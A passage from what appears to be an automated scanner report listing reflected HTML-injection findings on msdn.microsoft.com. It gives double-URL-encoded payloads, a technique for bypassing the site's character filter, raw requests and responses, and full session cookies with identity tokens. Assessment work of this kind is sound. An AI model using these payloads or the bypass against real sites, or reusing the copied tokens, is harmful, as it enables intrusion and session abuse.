17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa187916.aspx56e58"><a>b41c43eaea6" />
...[SNIP]...

2.25. http://msdn.microsoft.com/en-us/library/bb726434(office.12 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb726434(office.12

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 757a2%2522%253e%253ca%253e39c3f7167ab was submitted in the REST URL parameter 1. This input was echoed as 757a2"><a>39c3f7167ab in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us757a2%2522%253e%253ca%253e39c3f7167ab/library/bb726434(office.12 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9220
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us757a2"><a>39c3f7167ab/library/bb726434(office.12" />
...[SNIP]...

2.26. http://msdn.microsoft.com/en-us/library/bb726434(office.12 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb726434(office.12

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea44%2522%253e%253ca%253efa3efb9bd47 was submitted in the REST URL parameter 2. This input was echoed as 6ea44"><a>fa3efb9bd47 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library6ea44%2522%253e%253ca%253efa3efb9bd47/bb726434(office.12 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6ea44"><a>fa3efb9bd47/bb726434(office.12" />
...[SNIP]...

2.27. http://msdn.microsoft.com/en-us/library/bb726434(office.12 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb726434(office.12

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7fbc%2522%253e%253ca%253eb1e36bffcd2 was submitted in the REST URL parameter 3. This input was echoed as d7fbc"><a>b1e36bffcd2 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/bb726434(office.12d7fbc%2522%253e%253ca%253eb1e36bffcd2 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb726434(office.12d7fbc"><a>b1e36bffcd2" />
...[SNIP]...

2.28. http://msdn.microsoft.com/en-us/library/bb726434(office.12).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb726434(office.12).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a56b8%2522%253e%253ca%253ec3a0e51bb21 was submitted in the REST URL parameter 1. This input was echoed as a56b8"><a>c3a0e51bb21 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usa56b8%2522%253e%253ca%253ec3a0e51bb21/library/bb726434(office.12).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usa56b8"><a>c3a0e51bb21/library/bb726434(office.12)" />
...[SNIP]...

2.29. http://msdn.microsoft.com/en-us/library/bb726434(office.12).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb726434(office.12).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98201%2522%253e%253ca%253e9d927c0b48e was submitted in the REST URL parameter 2. This input was echoed as 98201"><a>9d927c0b48e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library98201%2522%253e%253ca%253e9d927c0b48e/bb726434(office.12).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; 